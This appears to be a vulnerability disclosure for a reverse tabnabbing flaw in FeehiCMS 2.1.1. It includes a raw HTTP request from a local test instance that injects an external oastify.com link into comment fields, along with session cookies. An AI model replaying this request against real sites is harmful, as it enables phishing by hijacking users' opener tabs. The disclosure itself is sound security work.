Skip to content

CVE-2025-63522.md

Latest commit

 

History

History
36 lines (30 loc) · 2.46 KB

CVE-2025-63522.md

File metadata and controls

36 lines (30 loc) · 2.46 KB

Reverse Tabnabbing vulnerability in FeehiCMS 2.1.1.

FeehiCMS https://github.com/liufee/cms

Login as a backend user. Navigate to the Comments Management function. Update the comments with links.

image 
POST /admin/index.php?r=comment%2Fupdate&id=10 HTTP/1.1
Host: localhost:8081
Content-Length: 411
Cache-Control: max-age=0
sec-ch-ua: "Not=A?Brand";v="24", "Chromium";v="140"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Accept-Language: en-US,en;q=0.9
Origin: http://localhost:8081
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: iframe
Referer: http://localhost:8081/admin/index.php?r=comment%2Fupdate&id=10
Accept-Encoding: gzip, deflate, br
Cookie: BACKEND_FEEHICMS=5440ac6b677107979c81bba2e1725e94; _csrf_backend=aa1a406cf3605aa65a70ffdc74b2d296fb53c6a3e287c4db4b55e5635b144f0ca%3A2%3A%7Bi%3A0%3Bs%3A13%3A%22_csrf_backend%22%3Bi%3A1%3Bs%3A32%3A%22imys3cRYiJYJLd36o-GVC8Zqp3Ml3Tyy%22%3B%7D; PHPSESSID=26fb8e4f9ee735093815221c4fc419fe; _identity=36b1340757dfa97b272930f316919bab2d038b7d849034c6306a06aa8f16e92aa%3A2%3A%7Bi%3A0%3Bs%3A9%3A%22_identity%22%3Bi%3A1%3Bs%3A46%3A%22%5B1%2C%22CDtE4877YiX55NQ_UTVXh8DhQ5TZjCKH%22%2C2592000%5D%22%3B%7D; _csrf=bb4f8d35c63f1529608814ced457ad3587f68ab334853e5bb2047aed56f7bbc1a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%223ZCnqhasM7_8OcwWLHzGTsw5PqXitHu-%22%3B%7D
Connection: keep-alive

_csrf_backend=0-H_WmMyQVhVg0P22we_Dk_pRRoFjJp6Qzw1u06cvkW6jIYpUFETATzJGryXY4w4IMQCTEa0wAszD3jXfcjHPA%3D%3D&Comment%5Bnickname%5D=http%3A%2F%2Fznq2el1xx3lcxr8if7us9x1uxl3cr2fr.oastify.com&Comment%5Bcontent%5D=aaa&Comment%5Bwebsite_url%5D=http%3A%2F%2Fznq2el1xx3lcxr8if7us9x1uxl3cr2fr.oastify.com&Comment%5Bip%5D=http%3A%2F%2Fznq2el1xx3lcxr8if7us9x1uxl3cr2fr.oastify.com&Comment%5Bstatus%5D=&Comment%5Bstatus%5D=1

Observe that the external links were not configured with rel="noopener noreferrer" security attributes.

image